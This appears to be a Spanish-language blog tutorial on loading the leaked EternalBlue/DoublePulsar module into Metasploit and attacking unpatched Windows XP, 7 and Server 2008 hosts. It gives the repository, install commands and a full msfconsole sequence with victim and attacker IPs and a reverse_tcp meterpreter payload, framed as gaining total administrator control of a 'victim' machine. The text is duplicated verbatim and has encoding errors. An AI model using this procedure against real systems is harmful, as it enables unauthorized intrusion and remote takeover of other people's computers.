En esta ocasión estaré mostrando como instalar el modulo de EternalBlue en MetaSploit para atacar sistemas vulnerables windows los cuales son windows xp, 7 & server 2008. Esta herramienta fue filtrada de la NSA el pasado año la cual atacaba una vulnerabilidad en los sistemas mencionados.
Bien primero debemos descargar el modulo desde su repositorio de Github.
> https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
> dpkg --add-architecture i386 && apt-get update && apt-get install wine32
Luego descargamos python2.7 y pywin32, instalamos ambos .exe con wine
Una vez lo tengamos descargados debemos mover el archivo eternalblue_doublepulsar.rb a la ruta /usr/share/metasploit-framework/modules/exploits/windows/smb/ y listo ahora pasamos a abrir nuestro metasploit
> msfconsole
> use exploit/windows/smb/eternalblue_doublepulsar
Luego le indicamos la ruta en la cual tenemos nuestro archivo de eternalblue.
> set eternalbluepath /root/Eternalblue-Doublepulsar-Metasploit/deps
Ahora le pasaremos la ip de nuestra victima y luego la ip de nuestra maquina.
> rhost 192.168.0.9
> lhost 192.168.0.11
y le indicamos el tipo de payload.
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
Una vez ejecutemos el comando exploit hará el proceso del envió de el DLL malicioso a la maquina victima para a si ejecutar nuestro payload. En caso de que nos de error es que la maquina no tiene el puerto 445 abierto o simplemente no es vulnerable. Existen maneras de comprobar si ese puerto esta abierto y también podrÃamos saber si nuestra victima es vulnerable o no.
Y como podemos ver ya tendrÃamos nuestra meterpreter y lo mejor de todo es que tendremos todos los permisos de administrador teniendo control total de la maquina.
Espero que les haya gustado este post, no olviden compartir y dar me gusta a nuestra pagina.
Bien primero debemos descargar el modulo desde su repositorio de Github.
> https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
> dpkg --add-architecture i386 && apt-get update && apt-get install wine32
Luego descargamos python2.7 y pywin32, instalamos ambos .exe con wine
Una vez lo tengamos descargados debemos mover el archivo eternalblue_doublepulsar.rb a la ruta /usr/share/metasploit-framework/modules/exploits/windows/smb/ y listo ahora pasamos a abrir nuestro metasploit
> msfconsole
> use exploit/windows/smb/eternalblue_doublepulsar
Luego le indicamos la ruta en la cual tenemos nuestro archivo de eternalblue.
> set eternalbluepath /root/Eternalblue-Doublepulsar-Metasploit/deps
Ahora le pasaremos la ip de nuestra victima y luego la ip de nuestra maquina.
> rhost 192.168.0.9
> lhost 192.168.0.11
y le indicamos el tipo de payload.
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
Una vez ejecutemos el comando exploit hará el proceso del envió de el DLL malicioso a la maquina victima para a si ejecutar nuestro payload. En caso de que nos de error es que la maquina no tiene el puerto 445 abierto o simplemente no es vulnerable. Existen maneras de comprobar si ese puerto esta abierto y también podrÃamos saber si nuestra victima es vulnerable o no.
Y como podemos ver ya tendrÃamos nuestra meterpreter y lo mejor de todo es que tendremos todos los permisos de administrador teniendo control total de la maquina.
Espero que les haya gustado este post, no olviden compartir y dar me gusta a nuestra pagina.
0 Comments